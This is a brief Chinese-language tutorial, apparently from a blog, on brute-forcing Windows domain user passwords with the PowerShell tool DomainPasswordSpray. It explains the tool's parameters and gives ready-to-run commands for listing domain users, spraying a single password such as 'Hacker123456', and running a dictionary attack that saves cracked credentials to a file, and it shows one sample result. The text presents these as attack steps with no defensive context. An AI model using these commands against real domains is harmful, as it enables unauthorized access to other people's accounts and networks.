前言
本篇介绍如何使用powershell爆破域内的用户密码。
DomainPasswordSpray
推荐一款名为DomainPasswordSpray的脚本,主要原理是先来抓取域用户账号,然后指定密码字典进行域认证。认证通过的就是密码正确的了。
因为作者的脚本有个瑕疵,这里使用倾旋大佬优化后的脚本
参数介绍
Domain 指定要测试的域名
RemoveDisabled 尝试从用户列表删除禁用的账户
RemovePotentialLockouts 删除锁定账户
UserLis 自定义用户列表(字典)。 如果未指定,这将自动从域中获取
Password 指定单个密码进行口令测试
PasswordList 指定一个密码字典
OutFile 将结果保存到某个文件
Force 当枚举出第一个后继续枚举,不询问
获取域环境中的用户列表
Get-DomainUserList 
单密码枚举
使用Hacker123456密码,逐个枚举认证
Invoke-DomainPasswordSpray -Password Hacker123456
字典枚举
从user.txt里面逐个取用户名,使用字典pwd.txt进行枚举,将认证成功的结果写入result.txt,虽然测试的时候会出报错信息,但是不影响脚本的使用
Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList pwd.txt -OutFile result.txt枚举的结果
test:Hacker123456